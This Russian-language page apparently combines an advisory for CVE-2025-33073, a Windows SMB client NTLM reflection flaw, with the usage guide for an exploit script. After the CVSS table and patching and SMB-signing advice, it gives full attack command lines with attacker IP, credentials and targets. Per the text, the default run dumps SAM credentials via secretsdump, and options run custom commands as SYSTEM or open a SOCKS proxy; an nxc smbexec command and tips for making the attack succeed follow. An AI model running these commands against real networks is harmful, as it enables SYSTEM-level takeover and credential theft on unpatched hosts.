
CVE-2025-33073
🔥 Высококритичное аутентифицированное удаленное выполнение кода 🔥 Неправильный контроль доступа в клиенте Windows SMB (CWE-284)
| Аспект | Детали |
|---|
| Оценка CVSS v3.1 | 8.8 (Высокий) 🔥 |
| Затронутые системы | Windows 10, 11, Server 2012–2025 (все редакции) 💻 |
| Дата раскрытия | 10 июня 2025 📅 (Исправлено в июньском Patch Tuesday 2025) |
| Эксплуатация | Активно эксплуатируется в дикой природе 😱 Добавлен в CISA KEV 21 октября 2025 |
| Вектор атаки | Сеть (аутентифицированный) 🌐 |
| Воздействие | Выполнение кода на уровне SYSTEM 👑 Горизонтальное перемещение через ретрансляцию Kerberos |
| Обход | Защита от отражения NTLM ⚡ |
Установите исправления сейчас! 🔧
→ Примените обновления Microsoft (например, KB5060998)
→ Руководство по обновлению Microsoft 🔗
Включите подпись SMB ✍️
→ Примените на всех клиентах и серверах
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
Ограничьте NTLM 🚫
→ Блокируйте NTLM где возможно
→ Отслеживайте попытки ретрансляции с помощью EDR-инструментов
Автоматическое исправление? 🤖
→ Используйте Vicarius vRx или пользовательские скрипты для массового исправления
Статус на 15 ноября 2025 года:
✅ Исправлено
❌ Все еще эксплуатируется в непатченных системах
🔔 Дедлайн CISA: 10 ноября 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Пользовательская команда Вместо запуска secretsdump можно выполнить пользовательскую команду.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS Для более скрытного выполнения команд после установки валидного соединения как SYSTEM. Параметры --target и --target-ip должны быть равны.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

Также можно запустить пользовательскую команду через proxychains вместо дампа SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Если вы находитесь в том же широковещательном домене, что и устройство, и оно уязвимо для отравления LLMNR, можно эксплуатировать устройство без необходимости регистрации DNS-записи.

Я замечал, что атака иногда не работает, потому что для атаки используется имя хоста, что приводит к DNS-запросу из Kali. Если Kali не использует DNS-сервер или вы получаете сообщение '/ FAILED' от impacket-ntlmrelayx, попробуйте добавить хост в ваш файл /etc/hosts. Это должно заставить атаку работать.
Если использовать IP, атака должна работать. Иногда запуск несколько раз приводит к SUCCESS вместо неудачи. До сих пор не совсем ясно, почему так происходит. Думаю, это связано с сетью.
Попробуйте другой метод принуждения с помощью -M или --method.
Локальная аутентификация NTLM происходит

Локальная аутентификация NTLM не происходит, что приводит к неудачной попытке

Не ждите — установите исправления сегодня! 🛑
Безопасность вашей сети зависит от этого. 💪